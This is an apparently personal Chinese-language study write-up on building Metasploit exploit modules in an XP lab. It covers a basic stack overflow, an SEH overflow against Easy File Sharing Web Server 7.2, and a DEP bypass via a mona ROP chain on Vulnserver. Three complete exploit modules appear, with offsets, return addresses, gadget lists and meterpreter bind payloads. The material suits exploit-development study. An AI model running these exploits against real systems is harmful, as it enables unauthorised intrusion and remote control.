启程
本章一开始写到:
If debugging is the process of removing bugs, then programming must be the process of putting them in.
在《0day安全》的学习过程中,我们已经接触过基础栈溢出、SEH、DEP的绕过以及其他的更为高级的漏洞利用方式。在这一章可以学习一下,怎样将那些手工操作通过Metasploit变得自动化。
使用Metasploit实现栈溢出
本节我们使用Metasploit对一个小型服务器程序进行栈溢出。服务器程序来自这里。它可以监听端口,并使用一个512字节长的缓冲区接受数据。
漏洞点如下:
int getl(int fd, char *s)
{
int n;
int ret;
s[0] = 0;
for (n = 0; (ret = recv(fd, s + n, 1, 0)) == 1 &&
s[n] && s[n] != '\n'; n++)
;
if (ret == -1 || ret == 0)
return (-1);
while (n && (s[n] == '\n' || s[n] == '\r' || s[n] == ' ')){
s[n] = 0;
n--;
}
return (n);
}
void manage_client(int s)
{
char buffer[512];
int cont = 1;
while (cont){
send(s, "\r\n> ", 4, 0);
if (getl(s, buffer) == -1)
return ;
if (!strcmp(buffer, "version"))
send(s, VERSION_STR, strlen(VERSION_STR), 0);
if (!strcmp(buffer, "quit"))
cont = 0;
}
}
这是最基础的栈溢出,我们只是借此来体会一下Metasploit编写exploit模块的过程。在0day安全|04 用Metasploit开发Exploit中我曾经尝试过这种操作,当时没有成功。
我将在XP上运行服务器程序,这样可以避免ASLR的影响,同时需要关闭DEP(关闭方法参考:0day安全|11 亡羊补牢:SafeSEH,注意,在XP下直接修改boot.ini是没法改的,需要右击“我的电脑”选择“属性“、”高级“、”启动故障和恢复-设置“、“编辑”才可以修改)。另外,由于使用的是作者已经编译好的可执行文件,我这里使用PESecurity先来检查一下可执行文件本身的防御措施开启情况:
很好,都没有开。
XP中运行程序:
# XP is 172.16.56.134
bof-server.exe 10000
之后我们与服务器建立连接:
# Attacker is 172.16.56.1
ncat 172.16.56.134 10000
并使用
python -c "print('A' * 512)"
来产生数据并复制到ncat中输入。A的数量每次以4递增。后来发现,当输入524个A时会导致服务器崩溃。
由于之前在做《0day安全》的实验时我将这个XP中的OD设置为了实时调试器(具体可以参考0day安全|05 堆溢出利用),所以服务器崩溃后自动进入OD。我们在OD中打开寄存器窗口,发现EIP恰好被覆盖为AAAA:
因此可知,524正是缓冲区首到栈上返回地址的偏移量。
于是我们便有了栈上shellcode的构造。非常简单:520个填充字节+esp跳板+payload,就不再展开说了。需要注意的是要根据服务端程序的实际情况来避免shellcode中出现badchar,这在0day安全|04 用Metasploit开发Exploit亦有提到,不必多说。
整个shellcode如下:
我们说过,要让exploit过程尽量自动化。前面计算偏移量是我们自己通过输入不同数量的A计算的,下面首先看一下这个过程的自动化。
自动化获得偏移量
我们使用pattern_create/pattern_offset两款工具。它们位于framework/tools/exploit下。
具体操作如下(直接使用系统自带的Ruby执行这两个脚本会出错,所以我用了Metasploit自带的Ruby解释器):
/opt/metasploit-framework/embedded/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb --length 550
得到
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2A
用它们作为输入,触发程序崩溃,然后看EIP:
是72413372,接着
/opt/metasploit-framework/embedded/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb --query 72413372 --length 550
得到
[*] Exact match at offset 520
和我们的计算是相符的,不过这个Ruby解释器也不怎么快。
这是什么原理?
我之前在研究Linux下栈溢出时接触过完全相同的工具,当时写了一些文字来解释其原理:
原理介绍-开始
“有高级玩家开发了pattern.py这个寻找溢出点的程序。先介绍玩法,再讲原理。”
首先生成一串字符串(长度估计得比你的溢出点偏移多就行):
./pattern.py 500 > input
然后在gdb中运行目标程序,并以重定向方式输入r < input,程序将在某个地址崩溃,如下:
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x316a4130 in ?? ()
接着只需要:
./pattern.py 0x316a4130
就可以得到:
Pattern 0x316a4130 first occurrence at position 272 in pattern.
也就是在基础玩法中需要272 * A作为溢出点偏移。
OK。那么原理呢?
读一下pattern.py的源码可知,它按照
Aa0Aa1...Aa9...Az9
Ba0...Bz9
...
Za0...Zz9
顺序来生成字符串,这串字符串的特点是,其中的任何一个子串在整个字符串中都是首次出现。所以当我们用一串非常长的字符去导致返回地址被覆盖时,覆盖地址的四个字符在上述字符串中是首次出现的,所以就可以根据导致崩溃的四个字符来计算溢出点偏移量。不过按照这个脚本的玩法,该特异字符串最长可达大写字母数 * 小写字母数 * 数字数 * 每组的长度3 = 20280,如果溢出所需填充量比这个大,就要考虑加入其他字符了。
原理介绍-结束
确定了偏移量,接下来就是寻找jmp esp跳板。
寻找跳板
按照以前的思路,就是用OD的插件找,或者直接在OD中搜索跳板指令。本节我们使用msfbinscan。首先OD附加进程看一下服务器加载了哪些模块:
作者在ws2_32.dll中找:
msfbinscan --jump esp ./ws2_32.dll
得到
[./ws2_32.dll]
0x71a22b53 push esp; ret
不过这个东西似乎没有OD的FindAddr插件来的方便。而且有那么多的DLL可以找到一个直接的jmp跳板,为什么不用。这里权当作尝试好了。后面我还是使用从OD插件FindAddr中找到的0x7dd333af作为跳板。
注意,有时候你的工具可能不会那么听话,比如:
我明明执行的是
python -c "print('A' * 520 + '\xc8\x3a\xd8\x77' + 'BBBBCCCC')" > xx.txt
结果用xxd查看这个文件,结尾却不是我想要的!!
000001e0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000001f0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000200: 4141 4141 4141 4141 c388 3ac3 9877 4242 AAAAAAAA..:..wBB
00000210: 4242 4343 4343 0a BBCCCC.
这就很坑了。
换做Perl就没事了:
perl -e 'print("A" x 520 . "\xc8\x3a\xd8\x77" . "BBBBCCCC")' > xx.txt
000001e0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000001f0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000200: 4141 4141 4141 4141 c83a d877 4242 4242 AAAAAAAA.:.wBBBB
00000210: 4343 4343 CCCC
不过这是手工调试时的问题,后面开发msf模块不存在这个问题。
确定坏字符
坏字符取决于具体的漏洞环境。根据漏洞源代码,我们将以下字符当作本次坏字符:
"\x20\x0a\x0d\x00\xff"
编写exploit模块并exploit
我们可以用msfvenom先看一下meterpreter的payload有多长:
msfvenom --payload windows/meterpreter/bind_tcp RHOST=172.16.56.134 --format c --arch x86 --platform windows --bad "\x00\xff\x20\x0a\x0d" --smallest
得到
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 632 (iteration=0)
x86/fnstenv_mov chosen with final size 310
Payload size: 310 bytes
还好,不是很长。
万事俱备了,模块代码如下:
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Stack Overflow Example',
'Description' => %q{
Stack Based Overflow Example
},
'Platform' => 'win',
'Author' => 'Rambo',
'Targets' => [
['Windows XP SP3', {'Ret' => 0x7dd333af, 'Offset' => 520}]
],
'Payload' => {
'Space' => 400,
'BadChars' => "\x20\x0a\x0d\x00\xff",
},
'DisclosureDate' => 'Oct 26 2018'
))
register_options(
[
Opt::RPORT(10000)
], self.class)
end
def exploit
connect
buf = make_nops(target['Offset'])
buf = buf + [target['Ret']].pack('V') + payload.encoded
sock.put(buf)
handler
disconnect
end
end
代码很好理解。其中.pack('V')是使用小端序。另外handler的解释与源码如下:
# Passes the connection to the associated payload handler to see if the
# exploit succeeded and a connection has been established. The return
# value can be one of the Handler::constants.
#
def handler(*args)
if payload_instance && handler_enabled?
payload_instance.handler(*args)
end
end
def interrupt_handler
if payload_instance && handler_enabled? && payload_instance.respond_to?(:interrupt_wait_for_session)
payload_instance.interrupt_wait_for_session()
end
end
参考如何向 Metasploit 中增加自定义 exploit 模块?,我们可以在$HOME/.msf4/modules/下建立对应的目录结构,如exploits/rambo/,然后把自己的模块放进去,msfconsole启动时会自动把它加入。
测试:
我们设置payload为windows/meterpreter/bind_tcp,run:
使用Metasploit实现基于SEH的栈溢出
本节我们使用Metasploit对Easy File Sharing Web Server 7.2利用SEH实现溢出。它在处理请求时存在漏洞,一个恶意的HEAD或GET会引起缓冲区溢出。
靶机环境依然是XP,关闭DEP。
Exploit-DB上的同作者的两个PoC都可以实现弹计算器:Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH)和Easy File Sharing Web Server 7.2 - GET Buffer Overflow (SEH),分别是GET和HEAD方法。参考他的PoC可以给我们一些启发。
(最初我想先通过逆向二进制程序的方式去定位一下漏洞发生点,但是代码量太多,我没有分析出来。未来学习了Fuzzing后可以来尝试一下这个程序。)
SEH的利用逻辑
作者利用SEH的技巧与我之前研究过的有些许差异:
他何必多此一举呢?直接把Handler覆盖为Shellcode的地址不就可以了?其实作者的这种构造方式更为鲁棒,因为它没有依赖Shellcode的绝对地址,而是使用了短跳转。
但是,这样为什么可行呢?在SEH异常处理函数被调用的时候,ESP指向哪里?为什么依靠PPR就可以返回到“下一条SEH记录地址”这个位置?
seh通常利用的是pop pop ret 一旦进入异常处理,就会把Pointer to next SEH的这个地址压入栈中进行系统处理,通过pop pop然后这个地址ret到我们的eip中,因为Pointer to Next..是可控的所以我们控制这个地址来控制eip。
我们验证一下他说的话。利用《0day安全》第六章的测试程序,跟踪到异常处理流程中,如下图:
上图中call ecx调用的正是shellcode,而我们注意在栈上(右下方红框内)第二个位置,恰恰是“下一条SEH记录地址”的指针!这样一旦调用shellcode,首先call指令会把一个返回地址压栈。所以恰好可以通过一个PPR来达到作者上面的利用思路。验证完毕。
偏移量计算
我按照上一节的方法去输入过量字符来尝试获得崩溃信息,但是这程序竟然直接崩溃退出,没有任何信息。这可能是因为覆盖了SEH,导致它没法给出错误信息就被操作系统给干掉了。用Ollydbg也无法获得这样的信息,所以下面就按照书上的方式老老实实地用Immunity操作(说明自己的调试水平和工具使用水平还有待提高啊)。
生成10000个测试字符:
/opt/metasploit-framework/embedded/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb --length 10000 > xx.txt
Vim打开xx.txt,在开头加入HEAD ;然后
python -c "print(' HTTP/1.0\r\n\r\n')" > y.txt
cat xx.txt y.txt > z.txt
接着用Vim十六进制模式编辑z.txt,删去xx.txt与y.txt内容之间的那个0x0a。进入Vim十六进制模式的方法如下:
vim -b z.txt
# In Vim
:%!xxd
# After editing, use the instruction below to save
:%!xxd -r
至此,测试文件生成完毕。在XP中打开Immunity,在其中打开fsws.exe,然后运行,出现如下窗口:
点击Try it。从而进入正常运行窗口:
此时在攻击机器上
ncat 172.16.56.134 10000 < z.txt
此时Immunity会把程序停止,并报出:
我们查看此时的SEH:
接着
/opt/metasploit-framework/embedded/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb --query 46356646 --length 10000
# result
[*] Exact match at offset 4065
/opt/metasploit-framework/embedded/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb --query 34664633 --length 10000
# result
[*] Exact match at offset 4061
于是我们知道偏移4061开始是下一条SEH的指针,偏移4065是本SEH的异常处理函数指针。
寻找PPR
我们通过在Immunity中执行(需要安装mona)
!mona seh
来寻找PPR。结果保存在Immunity安装目录下的seh.txt中。最后我们选择位于ImageLoad.dll的0x10019993。
现在就差一个短跳转了,我们可以用Metasploit来提供。
编写Exploit模块
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow (HEAD)',
'Description' => %q{
SEH based overflow example
},
'Platform' => 'win',
'Author' => 'Rambo',
'Targets' => [
['Easy File Sharing HTTP Server 7.2', {'Ret' => 0x10019993, 'Offset' => 4061}]
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' => {
'Space' => 400,
'BadChars' => "\x2b\x26\x3d\x25\x3a\x22\x2f\x5c\x2e\x20\x0a\x0d\x00\xff",
},
'DisclosureDate' => 'Dec 2 2015',
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(10000)
], self.class)
end
def exploit
connect
weapon = "HEAD "
weapon << make_nops(target['Offset'])
weapon << generate_seh_record(target['Ret'])
weapon << make_nops(19)
weapon << payload.encoded
weapon << " HTTP/1.0\r\n\r\n"
sock.put(weapon)
handler
disconnect
end
end
需要解释的是generate_seh_record(target['Ret']),它会把Ret作为异常处理函数地址,生成一个8字节的SEH节点。其中“下一条SEH记录地址”这个位置是一个短跳转,类似于\xeb\x0A\x90\x90,用来跳过SEH节点跳到后面的shellcode上。
测试:
msf exploit(rambo/test) > use exploit/rambo/my_seh
msf exploit(rambo/my_seh) > set RHOST 172.16.56.134
RHOST => 172.16.56.134
msf exploit(rambo/my_seh) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
使用Metasploit绕过DEP
我们使用网上一个博主自己写的Introducing Vulnserver作为漏洞示例程序。作者提供了源码,其中有较多漏洞,我们选择如下一处:
else if (strncmp(RecvBuf, "TRUN ", 5) == 0) {
char *TrunBuf = malloc(3000);
memset(TrunBuf, 0, 3000);
for (i = 5; i < RecvBufLen; i++) {
if ((char)RecvBuf[i] == '.') {
strncpy(TrunBuf, RecvBuf, 3000);
Function3(TrunBuf);
break;
}
}
memset(TrunBuf, 0, 3000);
SendResult = send( Client, "TRUN COMPLETE\n", 14, 0 );
}
void Function3(char *Input) {
char Buffer2S[2000];
strcpy(Buffer2S, Input);
}
很明显的缓冲区溢出。
快速测试无DEP情况
我们先在关闭DEP的环境下快速开发一次exploit:
找偏移:
/opt/metasploit-framework/embedded/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb --length 2500 > ~/y.txt
然后在y.txt最前面添加TRUN ,在结尾添加.。接着打开服务器程序,用ncat连接:
ncat 172.16.56.134 10000 < y.txt
程序崩溃,得到崩溃EIP是43396f43。接着
/opt/metasploit-framework/embedded/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb --query 43396f43 --length 2500
[*] Exact match at offset 2007
得到偏移。再考虑到要放入标识符.(这次我们把.不放在结尾了,怕影响后面排布shellcode),所以真正的填充字节应该是'TRUN .' + '\x90' * 2006。
再利用FindAddr找跳板地址,最后构成的exploit如下:
def exploit
connect
buf = 'TRUN .' + make_nops(target['Offset'])
buf = buf + [target['Ret']].pack('V') + payload.encoded
sock.put(buf)
handler
disconnect
end
测试:
打开并绕过DEP
修改boot.ini并重启系统。使用之前的exploit再次攻击:
失败,同时在XP上显示:
绕过DEP的方法我们在0day安全|12 数据与程序的分水岭:DEP已经讲过。这里我们将构建ROP链来调用VirtualProtect()关闭DEP并执行Shellcode。具体原理这里不再赘述。
本节我们将使用mona去自动化构造ROP链。
将Immunity附加到vulnerserver上,输入
!mona rop -m *.dll -cp nonull
稍等一会儿,在Immunity根目录下找到rop_chains.txt文件,这个文件提供非常丰富的内容,列举如下:
- 以Ruby/C/Python/Javascript四种语言格式给出调用VirtualProtect的ROP链
- 以上述四种语言格式给出了调用SetInformationProcess()的ROP链
- 以上述四种语言格式给出了调用SetProcessDEPPolicy()的ROP链
太强大了。我们将Ruby版本的调用VirtualProtect的ROP链复制进入我们的exploit模块,这个模块在之前未开DEP的模块基础上修改得来,如下:
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'DEP Bypass Exploit',
'Description' => %q{
DEP Bypass Using ROP Chains Example Module
},
'Platform' => 'win',
'Author' => 'Rambo',
'Targets' => [
['Windows XP SP3', {'Offset' => 2006}]
],
'Payload' => {
'Space' => 400,
'BadChars' => "\x20\x0a\x0d\x00\xff",
},
'DisclosureDate' => 'Oct 26 2018'
))
register_options(
[
Opt::RPORT(10000)
], self.class)
end
# this function is generated by mona
def create_rop_chain()
# rop chain generated with mona.py - www.corelan.be
rop_gadgets =
[
0x77c1debf, # POP EAX # RETN [msvcrt.dll]
0x6250609c, # ptr to &VirtualProtect() [IAT essfunc.dll]
0x77e62d1c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [RPCRT4.dll]
0x77f33564, # XCHG EAX,ESI # RETN [GDI32.dll]
0x77c130f9, # POP EBP # RETN [msvcrt.dll]
0x625011c7, # & jmp esp [essfunc.dll]
0x77c0b860, # POP EAX # RETN [msvcrt.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x77d4493b, # NEG EAX # RETN [USER32.dll]
0x7c9259c8, # XCHG EAX,EBX # RETN [ntdll.dll]
0x77bf1d16, # POP EAX # RETN [msvcrt.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x77da9b06, # NEG EAX # RETN [ADVAPI32.dll]
0x77c28fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x7c98b602, # POP ECX # RETN [ntdll.dll]
0x7c99e2c7, # &Writable location [ntdll.dll]
0x77e0cb20, # POP EDI # RETN [ADVAPI32.dll]
0x77e6d224, # RETN (ROP NOP) [RPCRT4.dll]
0x77df5bf7, # POP EAX # RETN [ADVAPI32.dll]
0x90909090, # nop
0x60fe2449, # PUSHAD # RETN [hnetcfg.dll]
].flatten.pack("V*")
return rop_gadgets
end
def exploit
connect
rop_chain = create_rop_chain()
buf = 'TRUN .' + make_nops(target['Offset'])
buf = buf + rop_chain + make_nops(16) + payload.encoded + '\r\n'
sock.put(buf)
handler
disconnect
end
end
可以发现,其中不再需要Ret。这正是返回导向编程技术(ROP)的先进之处。
测试:
注:msfrop可以用来查找零散ROP指令片段。
总结
本章让我学到了不同的漏洞利用姿势,也开了不少眼界,很棒。其中mona构造ROP链的能力让我印象深刻,因为之前在做《0day安全》的实验时,我深刻体会到自己手工构造ROP链去调用VirtualProtect()的繁琐复杂,很消耗脑力,这里竟然把整个过程最核心的部分全然自动化了。这也是高级漏洞利用技术的魅力所在。当然,像之前那样手工去构造、分析的能力是一定要掌握的,这是硬实力。尤其当mona等高级自动化工具面对更为复杂的情况不适用时,我们一定要具备能够修正工具的能力,这就要求我们知其所以然。
总的来说,先手工研究,过一遍,然后想办法让整个流程专业化自动化,这是值得推崇的解决问题的方式。
最后,真的是知道的越多,知道自己不知道的越多。无论是各种系统内部的机制,还是各种工具的原理,我理解得都不是很透彻。
So keep trying & hacking and never stop!